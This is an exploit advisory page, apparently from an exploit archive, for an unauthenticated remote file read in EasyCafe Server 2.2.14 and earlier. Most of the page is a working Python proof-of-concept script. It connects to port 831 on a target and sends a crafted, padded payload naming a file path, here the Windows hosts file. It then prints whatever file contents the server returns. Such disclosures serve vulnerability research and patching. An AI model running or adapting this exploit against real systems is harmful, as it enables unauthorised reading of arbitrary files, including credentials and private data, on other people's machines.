EasyCafe Server <= 2.2.14 Remote File Read

2015.12.26
Credit: R-73eN
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python -w # Title : EasyCafe Server <= 2.2.14 Remote File Read # Date : 25/12/2015 # Author : R-73eN # Tested on : Windows 7 Ultimate # Software Link : http://www.tinasoft.com/easycafe/ # Download Link: http://www.tinasoft.com/Download/easysetup.exe # Vulnerable Versions : EasyCafe Server <= 2.2.14 # EasyCafe Server has a feature to upload file from the server to a client. # And the request is as following. EasyCafe Server sends an UDP request to the client with the file that wants to upload, # Then the client receives the packet and connects to the server on port 831 and sends the directory of the file and receives it. # The problem is that a remote attacker can connect to port 831 and can retrive a file becuase the server doesn't validate the request, # and does not check if it has sent the UDP request which gives us full Read access to the system. # #EDB Note: Code my need some adjusting import socket #Banner banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / | | \n" banner +=" | || '_ | |_ / _ | | _ / _ '_ / _ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ | |___ \n" banner +=" |___|_| |_|_| ___/ ____|___|_| |_| /_/ ______|\n\n" print banner IP = "192.168.43.36" # Target IP PORT = 831 file_to_read = "C:\Windows\System32\drivers\etc\hosts" # File to read s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((IP, PORT)) file_to_read = "\x43" + file_to_read hex_value = ''.join(x.encode('hex') for x in file_to_read) fill = "\x00" end = "\x01\x00\x00\x00\x01" payload = hex_value.decode("hex") + fill * (261 - len(end) - len(file_to_read)) + end s.send(payload) s.settimeout(0) print "[+] Request Send Waiting for Response . . . [+]" try: data = s.recv(261) # Get header while data: data = s.recv(2048) print data except Exception: print "[+] https://www.infogen.al/ [+]" finally: s.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top